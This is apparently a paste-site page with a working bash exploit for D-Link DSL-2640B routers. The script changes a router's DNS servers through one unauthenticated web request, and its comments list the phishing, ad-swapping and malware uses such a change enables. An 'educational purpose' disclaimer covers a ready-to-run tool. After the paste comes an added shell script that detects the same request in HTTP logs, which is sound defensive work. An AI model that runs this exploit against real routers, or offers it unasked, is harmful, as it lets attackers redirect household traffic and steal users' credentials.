hackerscommunity

D-Link DSL-2640B unauthenticated remote dns change exploit

Jul 11th, 2015
#!/bin/bash
#
#  D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:
#  Different D-Link Routers are vulnerable to DNS change.
#  The vulnerability exists in the web interface, which is
#  accessible without authentication.
#
#  Tested firmware version: EU_2.03
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
#  DEVICES OR FIRMWARE VERSIONS MAY BE AFFECTED.
#
#  Once modified, systems use foreign DNS servers, which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "     D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
        echo "  Example: $0 192.168.1.1 8.8.8.8"
        echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
        echo "                  http://www.ethical-hacker.org/"
        echo "             https://www.facebook.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
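
The request the script sends has a fixed shape, which makes it straightforward to detect in HTTP logs. The following is an added example, not part of the original paste or the author's code: it scans Common Log Format lines for `/ddnsmngr.cmd` requests with `action=apply` and flags resolver values outside an expected list. The function names, the log format and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original paste. Flags requests matching the
# one the script sends (/ddnsmngr.cmd with action=apply) in HTTP logs.
# Assumption: Common Log Format lines from a proxy or sensor in front of the
# router's web interface; parameter values are not URL-encoded.

# qparam NAME QUERY: print one query parameter's value (empty if absent).
qparam() (
    IFS='&'; set -f              # split on '&', no globbing while splitting
    for pair in $2; do
        case $pair in "$1="*) printf '%s' "${pair#*=}"; break ;; esac
    done
)

# detect_dns_change RESOLVER...: read log lines on stdin; arguments are the
# resolver addresses you expect. Prints: client primary secondary OK|ALERT
detect_dns_change() (
    while IFS= read -r line; do
        case $line in *'/ddnsmngr.cmd?'*) ;; *) continue ;; esac
        client=${line%% *}                            # first field: client IP
        request=${line#*\"}; request=${request%%\"*}  # METHOD PATH PROTO
        path=${request#* }; path=${path%% *}
        query=${path#*\?}
        [ "$(qparam action "$query")" = apply ] || continue
        p=$(qparam dnsPrimary "$query"); s=$(qparam dnsSecondary "$query")
        verdict=OK
        for ip in "$p" "$s"; do
            [ -n "$ip" ] || continue                  # empty secondary is normal
            allowed=no
            for a in "$@"; do
                if [ "$ip" = "$a" ]; then allowed=yes; fi
            done
            [ "$allowed" = yes ] || verdict=ALERT
        done
        printf '%s %s %s %s\n' "$client" "${p:--}" "${s:--}" "$verdict"
    done
)

# Constructed sample log lines (documentation address ranges only).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [11/Jul/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [11/Jul/2015:10:00:05 +0000] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=203.0.113.53&dnsSecondary=&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 200 88
192.0.2.10 - - [11/Jul/2015:10:02:00 +0000] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=192.0.2.53&dnsSecondary=192.0.2.54&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 200 88
EOF
}

sample_log | detect_dns_change 192.0.2.53 192.0.2.54
```

Because the page states the web interface is reachable without authentication, any `action=apply` hit from a client that is not an administrator's workstation is worth reviewing even when the verdict is `OK`.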